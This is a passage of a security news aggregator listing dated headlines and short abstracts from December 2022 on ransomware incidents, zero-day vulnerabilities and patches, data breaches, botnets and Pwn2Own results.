The number of internet-facing cameras in the world is growing exponentially. Some of the most popular brands don't enforce a strong password policy, meaning anyone can peer into their owners' lives. Original post at https://cybernews.com/security/millions-ip-cameras-exposed/ When...Security Affairs
December 14, 2022 – Vulnerabilities
VMware fixed critical VM Escape bug demonstrated at Geekpwn hacking contest Full Text
Abstract
VMware fixed three flaws in multiple products, including a virtual machine escape issue exploited at the GeekPwn 2022 hacking competition. VMware addressed three vulnerabilities in multiple products, including a virtual machine escape flaw, tracked...Security Affairs
December 13, 2022 – Malware
Microsoft-signed malicious Windows drivers used in ransomware attacks Full Text
Abstract
Microsoft has revoked several Microsoft hardware developer accounts after drivers signed through their profiles were used in cyberattacks, including ransomware incidents.BleepingComputer
December 13, 2022 – Malware
TrueBot Malware Downloader Comes with Alternative Delivery Methods Full Text
Abstract
Russian-speaking hacking group Silence dropped the TrueBot malware downloader on over 1,500 systems worldwide to deploy their set of hacking tools, including Grace malware, Cobalt Strike, Teleport, and Cl0p ransomware. Teleport is a new custom data leakage tool created by the group. It uses Truebot ... Read MoreCyware
December 13, 2022 – Vulnerabilities
Citrix and NSA urge admins to fix actively exploited zero-day in Citrix ADC and Gateway Full Text
Abstract
Citrix urges customers to update their installs to fix actively exploited zero-day (CVE-2022-27518) in Citrix ADC and Gateway. Citrix urges administrators to apply security updates for a zero-day vulnerability, tracked as CVE-2022-27518, in Citrix...Security Affairs
December 13, 2022 – Attack
LockBit claims attack on California’s Department of Finance Full Text
Abstract
The Department of Finance in California has been the target of a cyberattack now claimed by the LockBit ransomware gang.BleepingComputer
December 13, 2022 – General
When Companies Compensate the Hackers, We All Foot the Bill Full Text
Abstract
Paying the piper emboldens the criminal syndicates behind the hackers and only serves to buttress ransom demands, opening the door to more attacks and burdening the consumer with higher prices.Cyware
December 13, 2022 – Criminals
Lockbit ransomware gang hacked California Department of Finance Full Text
Abstract
LockBit ransomware gang hacked the California Department of Finance and threatens to leak data stolen from its systems. The LockBit ransomware gang claims to have stolen 76Gb from the California Department of Finance and is threatening to leak the stolen...Security Affairs
December 13, 2022 – Vulnerabilities
Apple fixes new Webkit zero-day used in attacks against iPhones Full Text
Abstract
In security updates released today, Apple has fixed the tenth zero-day vulnerability since the start of the year, with this latest one actively used in attacks against iPhones.BleepingComputer
December 13, 2022 – Malware
Drokbk Flying Under the Radar by using GitHub as Dead Drop Resolver Full Text
Abstract
A previously undocumented malware, dubbed Drokbk, was linked to an Iranian hacker group known as Nemesis Kitten (aka DEV-0270). The malware uses GitHub as a dead drop resolver to extract data from a compromised system or to receive commands. The malware is written in .NET and is deployed post-intru ... Read MoreCyware
December 13, 2022 – Malware
Experts detailed a previously undetected VMware ESXi backdoor Full Text
Abstract
A new Python backdoor is targeting VMware ESXi servers, allowing attackers to take over compromised systems. Juniper Networks researchers spotted a previously undocumented Python backdoor targeting VMware ESXi servers. The researchers discovered the backdoor...Security Affairs
December 13, 2022 – Vulnerabilities
Microsoft December 2022 Patch Tuesday fixes 2 zero-days, 49 flaws Full Text
Abstract
Today is Microsoft's December 2022 Patch Tuesday, and with it comes fixes for two zero-day vulnerabilities, including an actively exploited bug, and a total of 49 flaws.BleepingComputer
December 13, 2022 – General
Pwn2Own wraps with nearly $1m paid out to ethical hackers Full Text
Abstract
Pwn2Own paid out almost $1 million to bug hunters at last week's event in Toronto, but the prize money wasn't big enough to attract attempts at cracking the iPhone or Google Pixel because miscreants can score far more from less wholesome sources.Cyware
December 13, 2022 – Breach
Twitter says recently leaked user data are from 2021 breach Full Text
Abstract
Twitter confirmed that the recent leak of members' profile information resulted from the 2021 data breach disclosed in August 2022. Twitter confirmed that the recent data leak of millions of profiles resulted from the 2021 data breach that the company...Security Affairs
December 13, 2022 – Vulnerabilities
Google releases dev tool to list vulnerabilities in project dependencies Full Text
Abstract
Google has launched OSV Scanner, a new tool that allows developers to scan for vulnerabilities in open-source software dependencies used in their project.BleepingComputer
December 13, 2022 – Ransomware
New Ransomware Families Lead Attacks Against Windows Systems Full Text
Abstract
According to Fortinet, three new (typical) ransomware families, named Aerst, ScareCrow, and Vohuk, are being increasingly used in attacks. The core target of the malware infection remains users in Germany and India. Experts have jotted down some similarities between ScareCrow and Conti, suggesting ... Read MoreCyware
December 13, 2022 – Botnet
New GoTrim botnet brute forces WordPress site admin accounts Full Text
Abstract
A new Go-based botnet malware named 'GoTrim' is scanning the web for self-hosted WordPress websites and attempting to brute force the administrator's password and take control of the site.BleepingComputer
December 13, 2022 – Attack
Ukrainian Railway, Government Agencies Allegedly Targeted by DolphinCape Malware Full Text
Abstract
The attacks involved an email campaign in which hackers sent out messages purportedly on behalf of Ukraine’s State Emergency Service with tips on how to identify a kamikaze drone.Cyware
December 13, 2022 – Vulnerabilities
Hackers exploit critical Citrix ADC and Gateway zero day, patch now Full Text
Abstract
Citrix strongly urges admins to apply security updates for an 'Critical' zero-day vulnerability (CVE-2022-27518) in Citrix ADC and Gateway that is actively exploited by state-sponsored hackers to gain access to corporate networks.BleepingComputer
December 13, 2022 – General
24% of technology applications contain high-risk security flaws Full Text
Abstract
With, arguably, a higher proportion of applications to contend with than other industries, tech firms would benefit from implementing improved secure coding training and practices for their development teams.Cyware
December 13, 2022 – Vulnerabilities
Amazon ECR Public Gallery flaw could have wiped or poisoned any image Full Text
Abstract
A severe security flaw in the Amazon ECR (Elastic Container Registry) Public Gallery could have allowed attackers to delete any container image or inject malicious code into the images of other AWS accounts.BleepingComputer
December 13, 2022 – Cryptocurrency
Chaos RAT Sharpens Up Cryptocurrency Mining Attack Campaign Full Text
Abstract
Trend Micro researchers spotted a cryptocurrency mining campaign against Linux machines using the open-source Chaos RAT to deploy Monero miner, among other functions. The main server is located in Russia and uses cloud-bulletproof hosting to hide its whereabouts. Experts suggest individuals an ... Read MoreCyware
December 12, 2022 – Attack
Play ransomware claims attack on Belgium city of Antwerp Full Text
Abstract
The Play ransomware operation has claimed responsibility for a recent cyberattack on the Belgium city of Antwerp.BleepingComputer
December 12, 2022 – Government
Australia Aims to Be World’s ‘Most Cyber-Secure’ Country Full Text
Abstract
A top Australian official vowed to transform the country into "the world’s most cyber-secure country by 2030" after a wave of data breaches revealed the personal data of millions of residents.Cyware
December 12, 2022 – Vulnerabilities
Fortinet urges customers to fix actively exploited FortiOS SSL-VPN bug Full Text
Abstract
Fortinet fixed an actively exploited FortiOS SSL-VPN flaw that could allow a remote, unauthenticated attacker to execute arbitrary code on devices. Fortinet urges customers to update their installs to address an actively exploited FortiOS SSL-VPN...Security Affairs
December 12, 2022 – Malware
New Python malware backdoors VMware ESXi servers for remote access Full Text
Abstract
A previously undocumented Python backdoor targeting VMware ESXi servers has been spotted, enabling hackers to execute commands remotely on a compromised system.BleepingComputer
December 12, 2022 – Ransomware
Researchers Warn of New Aerst, ScareCrow, and Vohuk Ransomware Families Full Text
Abstract
Targeting Windows computers, these are typical ransomware families that encrypt victim files and demand a ransom payment in exchange for a decryption key. These new ransomware have been used in an increasing number of attacks.Cyware
December 12, 2022 – Breach
Indian foreign ministry’s Global Pravasi Rishta portal leaks expat passport details Full Text
Abstract
The Cybernews research team reported that India’s government platform Global Pravasi Rishta Portal was leaking sensitive user data. Original post @ https://cybernews.com/security/indias-foreign-ministry-leaks-passport-details/ The Global Pravasi...Security Affairs
December 12, 2022 – Breach
Twitter confirms recent user data leak is from 2021 breach Full Text
Abstract
Twitter confirmed today that the recent leak of millions of members' profiles, including private phone numbers and email addresses, resulted from the same data breach the company disclosed in August 2022.BleepingComputer
December 12, 2022 – Attack
Knox College president addresses ransomware incident as notorious group claims credit Full Text
Abstract
The Hive ransomware group claimed to have encrypted “critical infrastructure and data,” compromised the college’s backup servers, and mined sensitive personal information like medical records and social security numbers.Cyware
December 12, 2022 – Cryptocurrency
Cryptomining campaign targets Linux systems with Go-based CHAOS Malware Full Text
Abstract
Researchers spotted a cryptocurrency mining campaign targeting Linux users with Go-based CHAOS malware (Trojan.Linux.CHAOSRAT). In November 2022, Trend Micro researchers discovered a cryptocurrency mining campaign targeting Linux users with Go-based...Security Affairs
December 12, 2022 – Breach
Uber suffers new data breach after attack on vendor, info leaked online Full Text
Abstract
Uber has suffered a new data breach after a threat actor leaked employee email addresses, corporate reports, and IT asset information stolen from a third-party vendor in a cybersecurity incident.BleepingComputer
December 12, 2022 – Breach
Data breach of Ontario’s vaccine booking system affects hundreds of thousands, province says Full Text
Abstract
Some 360,000 people will receive notices that their personal information was part of the November 2021 data breach of the COVAXX system, the Ministry of Public and Business Service Delivery said in a statement Friday.Cyware
December 12, 2022 – Hacker
Evilnum group targets legal entities with a new Janicab variant Full Text
Abstract
A hack-for-hire group dubbed Evilnum is targeting travel and financial entities with the new Janicab malware variant. Kaspersky researchers reported that a hack-for-hire group dubbed Evilnum is targeting travel and financial entities. The attacks...Security Affairs
December 12, 2022 – Vulnerabilities
Fortinet says SSL-VPN pre-auth RCE bug is exploited in attacks Full Text
Abstract
Fortinet urges customers to patch their appliances against an actively exploited FortiOS SSL-VPN vulnerability that could allow unauthenticated remote code execution on devices.BleepingComputer
December 12, 2022 – Malware
Python, JavaScript Developers Targeted With Fake Packages Delivering Ransomware Full Text
Abstract
On Friday, Phylum security researchers warned that a threat actor was typosquatting popular PyPI packages to direct developers to malicious dependencies containing code to download payloads written in Golang (Go).Cyware
December 12, 2022 – Attack
TrueBot infections were observed in Clop ransomware attacks Full Text
Abstract
Researchers reported an increase in TrueBot infections, attackers have shifted from using malicious emails as their primary delivery method to other techniques. Cisco Talos researchers reported an increase in TrueBot infections, threat actors...Security Affairs
December 12, 2022 – Solution
Cloudflare’s Zero Trust suite now available for free to at-risk groups Full Text
Abstract
Cloudflare has made its 'Cloudflare One Zero Trust' security suite free to public interest groups, election sites, and state organizations that are currently part of Project Galileo and the Athenian Project.BleepingComputer
December 12, 2022 – Vulnerabilities
Over 4,000 Vulnerable Pulse Connect Secure Hosts Exposed to Internet Full Text
Abstract
Pulse Secure appliances are known for being the target of choice for both cybercriminals and state-sponsored threat actors, and government agencies have issued multiple alerts to warn of the continuous exploitation of unpatched vulnerabilities.Cyware
December 12, 2022 – Policy and Law
UK: New rules for apps to boost consumer security and privacy Full Text
Abstract
Consumers in the U.K will be better protected from malicious apps which can steal data and money, thanks to new privacy and security rules for app store operators and developers.Cyware
December 12, 2022 – Vulnerabilities
A Year Later, That Brutal Log4j Vulnerability Is Still Lurking Full Text
Abstract
Attackers are still actively exploiting Log4Shell everywhere they can, from criminal hackers looking for a way into targets' systems to Chinese and Iranian state-backed attackers deploying the exploit in their espionage campaigns.Cyware
December 12, 2022 – Breach
Australian Telecom Firm Leaks Data of 130,000 Unlisted Customers Full Text
Abstract
"We're in the process of communicating to some unlisted customers whose details were incorrectly made available via Directory Assistance or the White Pages," Telstra said in a Friday statement.Cyware
December 11, 2022 – Ransomware
Clop ransomware uses TrueBot malware for access to networks Full Text
Abstract
Security researchers have noticed a spike in devices infected with the TrueBot malware downloader created by a Russian-speaking hacking group known as Silence.BleepingComputer
December 11, 2022 – General
Pwn2Own Toronto 2022 Day 4: $989K awarded for 63 unique zero-days Full Text
Abstract
The Pwn2Own Toronto 2022 is ended, and the participants earned a total of $989,750 for 63 unique zero-day exploits. The Zero Day Initiative’s Pwn2Own Toronto 2022 hacking competition has ended and these are the final numbers for the event: $989,750...Security Affairs
December 11, 2022 – General
Security Affairs newsletter Round 397 Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here. At...Security Affairs
December 11, 2022 – APT
MuddyWater APT group is back with updated TTPs Full Text
Abstract
The Iran-linked MuddyWater APT is targeting countries in the Middle East as well as Central and West Asia in a new campaign. Deep Instinct’s Threat Research team uncovered a new campaign conducted by the MuddyWater APT (aka SeedWorm, TEMP.Zagros,...Security Affairs
December 10, 2022 – Vulnerabilities
Air-gapped PCs vulnerable to data theft via power supply radiation Full Text
Abstract
A new attack method named COVID-bit uses electromagnetic waves to transmit data from air-gapped systems isolated from the internet over a distance of at least two meters (6.5 ft), where its captured by a receiver.BleepingComputer
December 10, 2022 – Hacker
Hackers earn $989,750 for 63 zero-days exploited at Pwn2Own Toronto Full Text
Abstract
Pwn2Own Toronto 2022 has ended with competitors earning $989,750 for 63 zero-day exploits (and multiple bug collisions) targeting consumer products between December 6th and December 9th.BleepingComputer
December 10, 2022 – Vulnerabilities
At least 4,460 vulnerable Pulse Connect Secure hosts are exposed to the Internet Full Text
Abstract
Censys researchers warn of more than 4,000 vulnerable Pulse Connect Secure hosts exposed to the Internet. Pulse Connect Secure is a widely-deployed SSL VPN solution for remote and mobile users, for this reason, it is a target of attacks by multiple...Security Affairs
December 10, 2022 – Government
US HHS warns healthcare orgs of Royal Ransomware attacks Full Text
Abstract
The US Department of Health and Human Services (HHS) warns healthcare organizations of Royal ransomware attacks. The human-operated Royal ransomware first appeared on the threat landscape in September 2022, it has demanded ransoms up to millions of dollars....Security Affairs
December 09, 2022 – Ransomware
The Week in Ransomware - December 9th 2022 - Wide Impact Full Text
Abstract
This week has been filled with research reports and news of significant attacks having a wide impact on many organizations.BleepingComputer
December 9, 2022 – APT
Iranian APT Targets US With Drokbk Spyware via GitHub Full Text
Abstract
A subgroup of the state-backed Iranian threat actor Cobalt Mirage is using a new custom malware dubbed "Drokbk" to attack a variety of US organizations, using GitHub as a "dead-drop resolver."Cyware
December 9, 2022 – Breach
CommonSpirit confirms data breach impacts 623K patients Full Text
Abstract
CommonSpirit Health confirmed that the October security breach resulted in the exposure of the personal data of 623,774 patients. In early October, Common Spirit, one of the largest hospital chains in the US, suffered a ransomware cyberattack that...Security Affairs
December 09, 2022 – Phishing
Rackspace warns of phishing risks following ransomware attack Full Text
Abstract
Cloud computing provider Rackspace warned customers on Thursday of increased risks of phishing attacks following a ransomware attack affecting its hosted Microsoft Exchange environment.BleepingComputer
December 9, 2022 – Vulnerabilities
Over 4,000 Vulnerable Pulse Connect Secure Hosts Exposed to Internet Full Text
Abstract
More than 4,000 internet-accessible Pulse Connect Secure hosts are impacted by at least one known vulnerability, attack surface management firm Censys warns. Pulse Connect Secure provides remote users with secure access to corporate resources.Cyware
December 9, 2022 – General
Pwn2Own Toronto 2022 Day 3: Participants earned nearly $1 million Full Text
Abstract
On the third day of the Zero Day Initiative’s Pwn2Own Toronto 2022 hacking competition, participants earned more than $250,000. On the third day of the Zero Day Initiative’s Pwn2Own Toronto 2022 hacking competition, participants earned more...Security Affairs
December 09, 2022 – Criminals
Australia arrests ‘Pig Butchering’ suspects for stealing $100 million Full Text
Abstract
The Australian Federal Police (AFP) have arrested four suspected members of a financial investment scam syndicate estimated to have stolen $100 million from victims worldwide.BleepingComputer
December 9, 2022 – Attack
Supply Chain Attack via New Malicious Python Package, “shaderz” Full Text
Abstract
This Python package was published on December 2, 2022, as shown in its official PyPI repository. The package includes malicious code in its setup.py installation script that downloads and runs an executable file as a part of its installation.Cyware
December 9, 2022 – Vulnerabilities
Cisco discloses high-severity flaw impacting IP Phone 7800 and 8800 Series Full Text
Abstract
Cisco disclosed a high-severity flaw in its IP phones that can be exploited to gain remote code execution and conduct DoS attacks. Cisco disclosed a high-severity vulnerability, tracked as CVE-2022-20968, impacting its IP Phone 7800 and 8800 Series...Security Affairs
December 09, 2022 – Vulnerabilities
Antivirus and EDR solutions tricked into acting as data wipers Full Text
Abstract
A security researcher has found a way to exploit the data deletion capabilities of widely used endpoint detection and response (EDR) and antivirus (AV) software from Microsoft, SentinelOne, TrendMicro, Avast, and AVG to turn them into data wipers.BleepingComputer
December 9, 2022 – Breach
Popular HR and Payroll Company Sequoia Discloses a Data Breach Full Text
Abstract
“An unauthorized party may have accessed a cloud storage system that contained personal information,” the company wrote in the customer and individual disclosures. WIRED reviewed examples of both notifications.Cyware
December 9, 2022 – Vulnerabilities
Experts devised a technique to bypass web application firewalls (WAF) of several vendors Full Text
Abstract
Claroty researchers devised a technique for bypassing the web application firewalls (WAF) of several vendors. Researchers at industrial and IoT cybersecurity firm Claroty devised an attack technique for bypassing the web application firewalls (WAF)...Security Affairs
December 09, 2022 – Vulnerabilities
Samsung Galaxy S22 hacked in 55 seconds on Pwn2Own Day 3 Full Text
Abstract
On the third day of Pwn2Own, contestants hacked the Samsung Galaxy S22 a fourth time since the start of the competition, and this time they did it in just 55 seconds.BleepingComputer
December 9, 2022 – Ransomware
New Ransom Payment Schemes Target Executives, Telemedicine – Krebs on Security Full Text
Abstract
Ransomware groups are constantly devising new methods for infecting victims and convincing them to pay up, but a couple of strategies tested recently seem especially devious.Cyware
December 09, 2022 – General
Holiday 2022 deal: 20% off Zero2Automated malware analysis training Full Text
Abstract
Zero2Automated, the creators of the popular malware analysis and reverse-engineering course, is having a Christmas special where you can get 20% off all courses on their site, with additional goodies thrown in.BleepingComputer
December 9, 2022 – Policy and Law
NDAA requires intelligence agencies to study creation of cyber collaboration program Full Text
Abstract
Federal agencies in charge of intelligence and cybersecurity will be required by the NDAA bill to study how to build a new cyber information collaboration environment to enable government and industry to better mitigate malicious cyber activity.Cyware
December 9, 2022 – Vulnerabilities
Vulnerabilities Allow Researcher to Turn EDR and AV Security Products Into Wipers Full Text
Abstract
Dubbed Aikido, the researcher’s wiper abuses the extended privileges that EDR and AV products have on the system, relying on decoy directories containing specially crafted paths to trigger the deletion of legitimate files.Cyware
December 08, 2022 – Vulnerabilities
Cisco discloses high-severity IP phone zero-day with exploit code Full Text
Abstract
Cisco has disclosed today a high-severity zero-day vulnerability affecting the latest generation of its IP phones and exposing them to remote code execution and denial of service (DoS) attacks.BleepingComputer
December 08, 2022 – Government
US Health Dept warns of Royal Ransomware targeting healthcare Full Text
Abstract
The U.S. Department of Health and Human Services (HHS) issued a new warning today for the country's healthcare organizations regarding ongoing attacks from a relatively new operation, the Royal ransomware gang.BleepingComputer
December 8, 2022 – Criminals
Cybercriminals Attacking Each Other Gives Defenders Access to Inside Info Full Text
Abstract
Researchers discovered a new sub-economy linked to cybercriminal activity: hackers scamming each other for millions of dollars. This practice led to the apparition of arbitration rooms in forums to settle conflicts.Cyware
December 8, 2022 – Malware
Zombinder APK binding service used in multiple malware attacks Full Text
Abstract
Zombinder is a third-party service on darknet used to embed malicious payloads in legitimate Android applications. While investigating a new malware campaign targeting Android and Windows systems, researchers at Threat Fabric discovered a darknet...Security Affairs
December 08, 2022 – Breach
Hacked corporate email accounts used to send MSP remote access tool Full Text
Abstract
MuddyWater hackers, a group associated with Iran's Ministry of Intelligence and Security (MOIS), used compromised corporate email accounts to deliver phishing messages to their targets.BleepingComputer
December 8, 2022 – Ransomware
Babuk Ransomware Variant in Major New Attack Full Text
Abstract
Attackers used a new Babuk strain to target a multibillion-dollar manufacturing company with more than 10,000 workstations and server devices. The attackers had network access for two weeks of full reconnaissance prior to launching their attack.Cyware
December 8, 2022 – General
Pwn2Own Toronto 2022 Day 2: Participants earned $281K Full Text
Abstract
Pwn2Own Toronto 2022 Day Two - Participants demonstrated exploits for smart speaker, smartphone, printer, router, and NAS. On the first day of the Zero Day Initiative’s Pwn2Own Toronto 2022 hacking competition participants earned $400,000 for 26 unique...Security Affairs
December 08, 2022 – Breach
CommonSpirit Health ransomware attack exposed data of 623,000 patients Full Text
Abstract
CommonSpirit Health has confirmed that threat actors accessed the personal data for 623,774 patients during an October ransomware attack.BleepingComputer
December 8, 2022 – Malware
Trojanized OneNote Document Leads to Formbook Malware Full Text
Abstract
Trustwave SpiderLabs’ researchers uncovered threat actors using a OneNote document to move Formbook malware, an information stealing trojan sold on an underground hacking forum since mid-2016 as malware-as-a-service.Cyware
December 8, 2022 – Vulnerabilities
Android app with over 5m downloads leaked user browsing history Full Text
Abstract
The Android app Web Explorer – Fast Internet left an open instance, exposing a trove of sensitive data that malicious actors could use to check specific users’ browsing history. Original post at https://cybernews.com/security/android-app-leaked-user-browsing-history/ A...Security Affairs
December 08, 2022 – Vulnerabilities
Cisco discloses high-severity IP phone bug with exploit code Full Text
Abstract
Cisco has disclosed today a high-severity vulnerability affecting the latest generation of its IP phones and exposing unpatched devices to remote code execution and denial of service (DoS) attacks.BleepingComputer
December 8, 2022 – Phishing
Direct Deposit Scams Around Holiday Scam Full Text
Abstract
Though this happens all the time, the fact that we're seeing an influx around the holiday is an interesting trend. It means that hackers are actively targeting people when they are likely to spend their money the most.Cyware
December 8, 2022 – APT
APT37 used Internet Explorer Zero-Day in a recent campaign Full Text
Abstract
Google warns that the North Korea-linked APT37 group is exploiting Internet Explorer zero-day flaw to spread malware. North Korea-linked APT37 group (aka ScarCruft, Reaper, and Group123) actively exploited an Internet Explorer zero-day vulnerability,...Security Affairs
December 08, 2022 – Solution
Tor Browser 12.0 brings Apple Silicon support, Android enhancements Full Text
Abstract
The Tor Project team has announced the release of Tor Browser 12.0, a major version release introducing support for Apple Silicon chips and several enhancements for the Android version.BleepingComputer
December 8, 2022 – Attack
French Sporting Goods Retailer Intersport Hit by Hive Ransomware Group Full Text
Abstract
The breach allegedly happened in November, with details made available only on the dark web. Passports, paystubs, and other details on Intersport customers are included in a sample file that media outlet Numerama claims Hive leaked on the dark web.Cyware
December 08, 2022 – Solution
Google: How Android’s Private Compute Core protects your data Full Text
Abstract
Google has disclosed more technical details about how Private Compute Core (PCC) on Android works and keeps sensitive user data processed locally on protected devices.BleepingComputer
December 8, 2022 – Outage
Cyberattack Takes Down the Met Opera’s Website and Box Office Full Text
Abstract
The Metropolitan Opera has been the victim of a cyberattack that has kept its website and box office out of commission for more than 30 hours, the company’s general manager said on Wednesday.Cyware
December 08, 2022 – Vulnerabilities
Samsung Galaxy S22 hacked again on second day of Pwn2Own Full Text
Abstract
Contestants hacked the Samsung Galaxy S22 again during the second day of the consumer-focused Pwn2Own 2022 competition in Toronto, Canada.BleepingComputer
December 8, 2022 – Attack
Cincinnati restaurants under attack by cyber hackers Full Text
Abstract
Multiple restaurants in Cincinnati, Ohio, are fighting cyber hackers who have stolen thousands of dollars, damaged their reputations, and shut down their social media pages.Cyware
December 08, 2022 – Criminals
Automated dark web markets sell corporate email accounts for $2 Full Text
Abstract
Cybercrime marketplaces are increasingly selling stolen corporate email addresses for as low as $2 to fill a growing demand by hackers who use them for business email compromise and phishing attacks or initial access to networks.BleepingComputer
December 8, 2022 – Business
Vaultree raises $12.8M to let companies more easily work with encrypted data Full Text
Abstract
Vaultree this week closed a $12.8 million Series A round co-led by Molten Ventures and Ten Eleven Ventures, with participation from SentinelOne, Elkstone Partners, CircleRock Capital, and Cyber Club London.Cyware
December 08, 2022 – Malware
New ‘Zombinder’ platform binds Android malware with legitimate apps Full Text
Abstract
A darknet platform dubbed 'Zombinder' allows threat actors to bind malware to legitimate Android apps, causing victims to infect themselves while still having the full functionality of the original app to evade suspicion.BleepingComputer
December 8, 2022 – Breach
Update: Patients’ Data at Seven More Hospitals Breached in CommonSpirit Ransomware Attack Full Text
Abstract
Patients of at least seven hospitals in Washington state affiliated with CommonSpirit have been affected by a data breach involving the hospital chain's October ransomware incident.Cyware
December 07, 2022 – Phishing
Elon Musk “Freedom Giveaway” crypto scam promoted via Twitter lists Full Text
Abstract
Twitter accounts giving Elon Musk a follow are being targeted in a crypto giveaway scam dubbed 'Freedom Giveaway.'BleepingComputer
December 07, 2022 – Encryption
Apple rolls out end-to-end encryption for iCloud backups Full Text
Abstract
Apple introduced today Advanced Data Protection for iCloud, a new feature that uses end-to-end encryption to protect sensitive iCloud data, including backups, photos, notes, and more.BleepingComputer
December 7, 2022 – Policy and Law
Meta Expected to Face New Fines After EU Privacy Ruling Full Text
Abstract
Meta is expected to face another large fine after Europe's data watchdog on Tuesday imposed binding decisions concerning the treatment of personal data by the owner of Facebook, Instagram and WhatsApp.Cyware
December 7, 2022 – Botnet
New Go-based botnet Zerobot exploits dozens of flaws Full Text
Abstract
Researchers discovered a new Go-based botnet called Zerobot that exploits two dozen security vulnerabilities IoT devices. Fortinet FortiGuard Labs researchers have discovered a new Go-based botnet called Zerobot that spreads by exploiting two dozen...Security Affairs
December 07, 2022 – Malware
New Zerobot malware has 21 exploits for BIG-IP, Zyxel, D-Link devices Full Text
Abstract
A new Go-based malware named 'Zerobot' has been spotted in mid-November using exploits for almost two dozen vulnerabilities in a variety of devices that include F5 BIG-IP, Zyxel firewalls, Totolink and D-Link routers, and Hikvision cameras.BleepingComputer
December 7, 2022 – Business
Brazilian PAM Company Senhasegura Raises $13 Million Full Text
Abstract
Founded in 2010 and having a market presence in over 55 countries, the Sao Paulo-based privileged access management (PAM) vendor officially launched its North American operations in August this year.Cyware
December 7, 2022 – Vulnerabilities
Pwn2Own Toronto 2022 hacking competition. Samsung S22 hacked Full Text
Abstract
The Pwn2Own Toronto 2022 hacking competition has begun, this is the 10th anniversary of the consumer-focused version of the contest. The news of the Samsung Galaxy S22 hack on the first day of Pwn2Own Toronto 2022 made the headlines. White hat hackers...Security Affairs
December 07, 2022 – Attack
CloudSEK claims it was hacked by another cybersecurity firm Full Text
Abstract
Indian cybersecurity firm CloudSEK says a threat actor gained access to its Confluence server using stolen credentials for one of its employees' Jira accounts.BleepingComputer
December 7, 2022 – General
Regulation won’t fix internet routing security Full Text
Abstract
The routing system security is critical to maintaining privacy online and ensuring information isn’t hijacked by malicious actors and that the information an organization sends — and receives — is trustworthy.Cyware
December 7, 2022 – Vulnerabilities
Sophos fixed a critical flaw in its Sophos Firewall version 19.5 Full Text
Abstract
Sophos addressed several vulnerabilities affecting its Sophos Firewall version 19.5, including arbitrary code execution issues. Sophos has released security patches to address seven vulnerabilities in Sophos Firewall version 19.5, including some arbitrary...Security Affairs
December 07, 2022 – Malware
Hackers use new Fantasy data wiper in coordinated supply chain attack Full Text
Abstract
The Iranian Agrius APT hacking group is using a new 'Fantasy' data wiper in supply-chain attacks impacting organizations in Israel, Hong Kong, and South Africa.BleepingComputer
December 7, 2022 – Criminals
Ransomware group Vice Society targeted dozens of schools in 2022, new report finds Full Text
Abstract
More than 40 educational organizations, including 15 in the United States, suffered ransomware attacks launched by the cybercriminal group known as Vice Society, researchers at Palo Alto Networks revealed in a report published Tuesday.Cyware
December 07, 2022 – Vulnerabilities
Google: State hackers still exploiting Internet Explorer zero-days Full Text
Abstract
Google's Threat Analysis Group (TAG) revealed today that a group of North Korean hackers tracked as APT37 exploited a previously unknown Internet Explorer vulnerability (known as a zero-day) to infect South Korean targets with malware.BleepingComputer
December 7, 2022 – Phishing
Infected WordPress Plugins Redirect to Push Notification Scam Full Text
Abstract
Instead of leveraging the typical base64 encoding to evade detection, the attacker was adding variations of a PHP function to normal plugin files which decoded hex2dec from a second file containing a hexadecimal payload.Cyware
December 07, 2022 – Criminals
CryptosLabs ‘pig butchering’ ring stole up to $505 million since 2018 Full Text
Abstract
A previously unknown investment scam group named 'CryptosLabs' has stolen up to €480 million ($505 million) from victims in France, Belgium, and Luxembourg, since the launch of its operation in 2018.BleepingComputer
December 7, 2022 – Government
Maryland bans use of TikTok, other products by state agencies Full Text
Abstract
The state of Maryland banned the use of TikTok and other Chinese and Russian products by state agencies, citing reporting by NBC News about hackers linked to the Chinese government stealing millions in Covid benefits from U.S. state governments.Cyware
December 07, 2022 – Phishing
Elon Musk’s Twitter followers targeted in fake crypto giveaway scam Full Text
Abstract
Twitter accounts giving Elon Musk a follow are being targeted in a crypto giveaway scam dubbed 'Freedom Giveaway.'BleepingComputer
December 7, 2022 – Attack
South Pacific vacations may be wrecked by ransomware Full Text
Abstract
New Zealand's Privacy Commission has signaled it may open an investigation into local managed services provider Mercury IT, which serves many government agencies and businesses and has been hit by ransomware.Cyware
December 06, 2022 – Vulnerabilities
Samsung Galaxy S22 hacked twice on first day of Pwn2Own Toronto Full Text
Abstract
Contestants have hacked the Samsung Galaxy S22 smartphone twice during the first day of the Pwn2Own Toronto 2022 hacking competition, the 10th edition of the consumer-focused event.BleepingComputer
December 6, 2022 – General
68% of IT leaders are worried about API sprawl Full Text
Abstract
As per an Axway study, ensuring data security and controlling API sprawl were top concerns, with 68% worrying about complexity due to sprawl and 48% of respondents ranking “increased security challenges” as their single greatest concern.Cyware
December 6, 2022 – Denial Of Service
Russia’s second-largest bank VTB Bank under DDoS attack Full Text
Abstract
Russia's second-largest bank VTB Bank reveals it is facing the largest DDoS (distributed denial of service) attack in its history. State-owned VTB Bank, the second-largest financial institution in Russia, says it is facing the largest DDoS (distributed...Security Affairs
December 06, 2022 – Solution
Kali Linux 2022.4 adds 6 new tools, Azure images, and desktop updates Full Text
Abstract
Offensive Security has released Kali Linux 2022.4, the fourth and final version of 2022, with new Azure and QEMU images, six new tools, and improved desktop experiences.BleepingComputer
December 6, 2022 – Vulnerabilities
Ninth Actively Exploited Chrome Zero-day Spotted in the Wild Full Text
Abstract
Google warned against a highly critical zero-day described as a type of confusion flaw in the browser’s V8 JavaScript engine. Identified as CVE-2022-4262, the flaw could let a remote attacker potentially exploit heap corruption via a specially crafted HTML page. Hackers exploiting it can execute RC ... Read MoreCyware
December 6, 2022 – Vulnerabilities
A flaw in the connected vehicle service SiriusXM allows remote car hacking Full Text
Abstract
Researchers discovered a security flaw in the connected vehicle service SiriusXM that exposes multiple car models to remote attacks. Cybersecurity researchers discovered a security vulnerability in the connected vehicle service provided by SiriusXM...Security Affairs
December 06, 2022 – Breach
Amnesty International Canada breached by suspected Chinese hackers Full Text
Abstract
Amnesty International's Canadian branch has disclosed a security breach detected in early October and linked by cybersecurity firm Secureworks, who investigated the incident, to a threat group likely sponsored by China.BleepingComputer
December 6, 2022 – Ransomware
Ransomware Professionalization Grows as RaaS Takes Hold Full Text
Abstract
As ransomware's prevalence has grown over the past decade, leading ransomware groups such as Conti have added services and features as part of a growing trend toward professionalization.Cyware
December 6, 2022 – Malware
